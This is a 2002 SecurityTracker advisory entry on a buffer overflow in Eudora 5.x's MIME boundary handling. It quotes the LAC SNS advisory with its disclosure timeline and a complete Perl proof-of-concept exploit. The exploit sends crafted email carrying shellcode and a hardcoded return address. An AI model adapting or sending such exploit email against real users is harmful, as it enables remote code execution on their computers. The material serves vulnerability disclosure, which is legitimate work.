SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (E-mail Client)  >   Eudora Vendors:   Qualcomm
(Exploit Code is Available) Re: Qualcomm Eudora E-mail Client Software Buffer Overflow in Processing MIME Boundaries Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1004967
SecurityTracker URL:  http://securitytracker.com/id/1004967
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 6 2002
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 5.x
Description:   A buffer overflow vulnerability was reported in the Eudora e-mail client running on Microsoft Windows platforms. A remote user can execute arbitrary code on the system.

SecureNet Service reported that the buffer overflow can be triggered by a remote user sending e-mail to a target user containing a specially crafted (and long) string as the MIME message boundary. No further details were provided.

A user has provided some demonstration exploit code, available in the Source Message.
Impact:   A remote user can send e-mail to execute arbitrary code on the recipient's computer. The code will run with the privileges of the recipient.
Solution:   No solution was available at the time of this entry.

It is reported that the vendor plans to fix the flaw in the next release. No release date was provided.
Vendor URL:  www.eudora.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:   Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   This archive entry is a follow-up to the message listed below.
Aug 6 2002 Qualcomm Eudora E-mail Client Software Buffer Overflow in Processing MIME Boundaries Lets Remote Users Execute Arbitrary Code


 Source Message Contents
Date:  Tue, 06 Aug 2002 15:49:24 +0900
Subject:  Re: [SNS Advisory No.55] Eudora 5.x for Windows Buffer Overflow Vulnerability



This is a proof of concept exploit for Eudora 5.x buffer overflow.

Tested on:
  Japanese Windows 2000 Professional SP2
  Eudora Version 5.0.2-Jr2


#!/usr/local/bin/perl

#---------------------------------------------------------------------
# Eudora Version 5.0.2-Jr2 exploit for Japanese Windows 2000 Pro (SP2)
# written by Kanatoko <anvil@jumperz.net>
# http://www.jumperz.net/
#---------------------------------------------------------------------

use Socket;

$connect_host   = 'mail.jumperz.net';
$port           = 25;
$env_from       = 'anvil@jumperz.net';
$env_to         = 'target@jumperz.net';
$from           = 'anvil@jumperz.net';
$to             = 'target@jumperz.net';

$iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
connect(SOCKET,$sock_addr) || die "Connect Error\n";
select(SOCKET); $|=1; select(STDOUT);

        #egg written by UNYUN (http://www.shadowpenguin.org/)
        #57bytes
$egg  = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";

$buf  = "\x90" x 121;
$buf .= $egg;
$buf .= "\xEB\xA0"; #JMP -0x60
$buf .= "A" x 2;
$buf .= "\x97\xAC\xE3\x77"; #0x77e3ac97 JMP EBX in user32.dll

$hoge = <SOCKET>;
print SOCKET "HELO hoge\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "MAIL FROM:<$env_from>\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "RCPT TO:<$env_to>\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "DATA\x0D\x0A";
$hoge = <SOCKET>;

print SOCKET << "_EOD_";
MIME-Version: 1.0\x0D
>From: $from\x0D
To: $to\x0D
Content-Type: multipart/mixed; boundary="$buf"\x0D
\x0D
.\x0D
_EOD_
$hoge = <SOCKET>;
print SOCKET "QUIT\x0D\x0A";
$hoge = <SOCKET>;


-- 
Kanatoko  <anvil@jumperz.net>
JUMPER : http://www.jumperz.net/(Japanese)


On Mon, 05 Aug 2002 15:24:25 +0900
snsadv@lac.co.jp wrote:

> ----------------------------------------------------------------------
> SNS Advisory No.55
> Eudora 5.x for Windows Buffer Overflow Vulnerability
> 
> Problem first discovered: 6 Jun 2002
> Published: 5 Aug 2002
> ----------------------------------------------------------------------
> 
> Overview:
> ---------
>   Eudora 5.x for Windows contains a buffer overflow vulnerability, 
>   which could allow a remote attacker to execute arbitrary code.
> 
> Problem Description:
> --------------------
>   Eudora developed and distributed by QUALCOMM Inc. 
>   (http://www.qualcomm.com/), is a Mail User Agent running on Windows 
>   95/98/2000/ME/NT 4.0 and MacOS 8.1 or later.
> 
>   The buffer overflow occurs when Eudora receives a message using a long
>   string as a boundary, which is used to divide a multi-part message into
>   separate parts.  In our verification environment, we have found that 
>   this could allow arbitrary commands to be executed. 
> 
> Tested Version:
> ---------------
>   Eudora 5.0-J for Windows (Ver.5.0.2-Jr2 trial) [Japanese]
>   Eudora 5.1.1 for Windows (Sponsored Mode) [English]
> 
> Tested OS:
> ----------
>   Microsoft Windows 2000 Professional SP2 [Japanese]
>   Microsoft Windows 98 SE [Japanese]
> 
> Solution:
> ---------
>   The problem will be fixed in the next release of Eudora.
>   The vendor has not reported when the next release will be available.
> 
> Communication background:
> -------------------------
>  6 Jun 2002  : We discovered the vulnerability.
>  6 Jun 2002  : We reported the findings to Livin' on the EDGE Co., Ltd. 
>                (user support of Japanese version) .
>  14 Jun 2002 : the findings were reported again to Livin' on the EDGE Co.,
>                Ltd. .
>  17 Jun 2002 : We contacted QUALCOMM Inc. .
>  18 Jun 2002 : QUALCOMM Inc. sent a reply stating that they had started an
>                investigation of the problem.
>  3 Jul 2002  : We asked QUALCOMM Inc. about the progress of the
>                investigation
>  19 Jul 2002 : We asked QUALCOMM Inc. again about the progress of the
>                investigation
>  24 Jul 2002 : We informed QUALCOMM Inc. about the announcement schedule
>                of this advisory
>  25 Jul 2002 : QUALCOMM Inc. reported that this problem will be fixed in
>                the next release
>  5 Aug 2002  : We decided to disclose this vulnerability due to concern
>                over the potential consequences this issue may cause.
>                Livin' on the EDGE Co., Ltd. has not provided any comments
>                on this issue as of August 5, 2002.
> 
> Discovered by:
> --------------
>   Nobuo Miwa (LAC / n-miwa@lac.co.jp)
> 
> Disclaimer:
> -----------
>   All information in these advisories are subject to change without any 
>   advanced notices neither mutual consensus, and each of them is released 
>   as it is. LAC Co.,Ltd. is not responsible for any risks of occurrences 
>   caused by applying those information.
> 
> ------------------------------------------------------------------
> SecureNet Service(SNS) Security Advisory <snsadv@lac.co.jp>
> Computer Security Laboratory, LAC  http://www.lac.co.jp/security/
> 
>


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC